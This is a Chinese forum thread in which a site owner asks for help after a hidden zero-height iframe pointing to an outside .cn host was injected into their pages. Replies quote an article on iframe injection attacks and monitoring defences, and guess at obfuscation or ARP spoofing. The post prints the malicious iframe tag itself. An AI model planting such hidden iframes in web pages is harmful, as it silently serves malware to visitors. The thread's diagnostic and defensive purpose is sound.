网站被嵌入<iframe src=http://45646oo.cn/sky/ms.htm?vip8 width=50 height=0></iframe>,但代码里也没有这段代码。向大家求救!!!
解决方案 »
- winform安装问题,求解?????????????????????
- 二级菜单的撑大问题
- 数据库函数问题!
- dropdownlist二级联动的问题!
- asp.net(c#)如何创建以当前年月日为名称的文件夹?
- ⊙⊙⊙iframe的高度跟宽度。只可以设置固定的吗?不可以动态改变吗?我真的不想要iframe里面的那丑陋的滚动条。
- 这是什么原因?
- datagrid的模板列数据绑定的运行问题?
- 求救!对路径“E:\wwwroot\newkfc\doc”的访问被拒绝。。。
- 高分求链接!!(半小时结贴)
- 自己开发的控件,支持网页精确报表套打和智能脚本计算,欢迎拍砖
- datalist里使用js 控制控件的显示隐藏
如何在这波烽火中生存,最重要的是必须正视问题的严重性,在网站开发与维运阶段提升安全意识。另外,也可藉由导入自动化工具的方法提升安全性,如果资安预算有限,至少找出企业能负荷的安全防护底线,保障企业网站与用户的安全。 治标:监控网页异动,立即回复
黑客有许多攻下网站的手法,但以修改网页进行偷渡恶意程序的手法而言,最终必须修改网页才能达到目的,因此监控网页便是IT人员可以应变黑客攻击的方法。 黑客修改网页时,对于档案的大小、网页的最后修改时间都会造成影响,因此IT人员可以自行撰写程序,比对网站最近一次修改档案的大小或日期和在线档案是否一致,一旦有出入,就代表有异常,这时就可以进一步检视档案是否有不明的iframe或JavaScript语法指向外部网站,藉此判定是否已经遭到黑客 攻击。万一遭到攻击的话,则必须先做好证据保存的动作,再将网站复原成未入侵前的状态。 网管论坛bbs_bitsCN_com 市面上有针对网站的监控与复原动作提供自动化解决方案的产品,这类产品通常能做到实时化的监控与通报机制,当网站遭到窜改时,立即复原成原先页 面,就能阻挡在网页中植入程序代码的攻击方式,入侵的记录也会保留住。网页监控与复原产品通常也能保护档案服务器上的档案,如果黑客企图删除或更改文件时,系统便会实时复原。 这类产品的价格通常在数万元到十几万元,以资安的产品而言相对较低,对于规模较小的企业较能负担,但它能做便是保持网页不被窜改更动,乍看之下成功的抵挡目前这波新兴的黑客攻击手法,然而它终究只是治标之道。 虽然黑客不能窜改网页内容,但毕竟已经登堂入室,取得修改网页的权限,这意味着黑客也能将数据带走,或者不使用修改网页程序代码的方式,绕道透过SQL Injection的攻击手法,将数据库中的内容带走。 因此不论企业自行撰写程序或采用自动化产品来监控与复原网页,都必须明白它的限制在于提供消极的解法,只保护住网页,但黑客进攻的漏洞没有找出来修补,攻击仍会发生。 网管联盟bitsCN@com
解析iFrame攻击手法 对黑客而言,如何让使用者毫无警觉,下载恶意程序到使用者的计算机,才能达到黑客之后的目的,例如窃取账号、密码或植入傀儡程序。 利用HTML语法中的iframe语法,即是一个极常见的手法。iframe设计的目的,是让设计人员能在网页中嵌入页框,而页框中可以加载另一个页面,透过这种方式可以设计出更为弹性的网页功能。但iframe到黑客手中,就有了不一样的玩法。只要在iframe属性将宽与高设定为「0」时,被呼叫的页面一样会执行,但不会显示在网页上。这种宛如替网页穿上隐身衣的作法,就会在使用者浏览被骇网站时,神不知鬼不觉地执行藏在隐身页面中的语法。由于iframe手法太过盛行,而且具有明显的辨识特征,于是就有变种的方式出现,利用JavaScript语法改写呼叫手法,再混进网页原有JavaScript中,增加发掘的难度。 一般而言,浏览器如果设定适当的安全性等级,恶意程序在下载或执行时会出现警告讯息,但如果黑客利用安全漏洞,就有机会在不用任何询问下安装恶意程序。比起自行伪造网站容易被人识破,黑客会挑选流量大或知名网站作为散播的源头,成功率较高。黑客会尝试由各种可能的管道入侵,例如网页应用程序本身的缺陷或 是未更新的漏洞。Google强大的搜寻能力,更是助长黑客能取得更多没有作好设定的网站,透过一些关键词往往能查出系统信息或可能的弱点,而让黑客可以取得修改网页的权限。
中国网管论坛bbs.bitsCN.com
因此当企业发现网站被植入恶意程序时,已经是黑客攻击手段的最后阶段,它只是表面上最容易发现的迹象,事实上,系统或网站应用程序必然存在漏洞,让黑客得以顺藤摸瓜,进而修改网页。
【转自www.bitsCN.com】
它把那段恶意代码,分成几段,写在几个变量中,然后把变量值合起来输出,你搜索的时候搜的是整体,也就查不到。或者是经过转换了,或者是利用 WebRequest 动态读取的?或者是把代码写在一个文件中,然后把它改名为图片文件,再去读这个图片文件……
建议搜索一下arp相关文章,然后下个360来防护